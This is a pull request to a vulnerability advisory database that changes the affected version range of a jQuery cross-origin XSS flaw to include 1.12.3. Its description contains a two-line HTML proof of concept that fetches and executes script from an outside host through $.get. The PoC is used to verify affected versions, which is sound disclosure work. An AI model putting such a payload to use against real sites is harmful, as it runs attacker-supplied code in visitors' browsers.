### PR TITLE
Fix NSWG-ECO-328 affected range

### DIFF
--- a/vuln/npm/328.json
+++ b/vuln/npm/328.json
@@ -7,7 +7,7 @@
   "module_name": "jquery",
   "publish_date": "2017-03-21T18:23:53+00:00",
   "cves": [],
-  "vulnerable_versions": ">=1.4.0 <=1.11.3 || >=1.12.4 <=2.2.4",
+  "vulnerable_versions": ">=1.4.0 <=1.11.3 || >=1.12.3 <=2.2.4",
   "patched_versions": ">=3.0.0",
   "slug": "jquery_xss",
   "overview": "Jquery is a javascript library for DOM traversal and manipulation, event handling, animation, and Ajax. \n\nWhen text/javascript responses are received from cross-origin ajax requests not containing the option `dataType`, the result is executed in `jQuery.globalEval` potentially allowing an attacker to execute arbitrary code on the origin.",


### PR DESCRIPTION
This adds 1.12.3 to the affected range
I verified that the PoC works on 1.12.3 but does not work on 1.12.2.

PoC (run from `https?://`, not `file://`):
```html
<script src="https://code.jquery.com/jquery-1.12.3.js"></script>
<script>$.get('http://sakurity.com/jqueryxss')</script>
```

Refs: https://github.com/RetireJS/retire.js/commit/384d454d2b4a8fe08022b98d86b54f73a9ffe232